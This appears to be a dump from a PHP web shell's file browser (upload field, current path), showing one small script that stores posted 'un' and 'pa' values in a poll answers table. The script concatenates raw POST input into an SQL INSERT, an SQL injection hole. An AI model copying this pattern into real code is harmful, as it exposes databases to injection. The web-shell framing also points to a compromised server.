Your IP : 216.73.216.48


Current Path : /srv/www/vlevski/enter/
Upload File :
Current File : //srv/www/vlevski/enter/snddata.php

<?php
if(isset($_POST["un"]))
{
	$pa = $_POST["pa"];
	$un = $_POST["un"];
	$t=time();
	include("./conn.php");
	$lgn=mysqli_query($db, "INSERT INTO `pollsans` (`i`, `pi`, `u`, `a`, `ts`) VALUES (NULL, '10', '".$un."', '".$pa."', '".$t."');");
	if ($lgn)
	{
		print("OK");
	}
	else
	{
		print("ERR");
	}
}
?>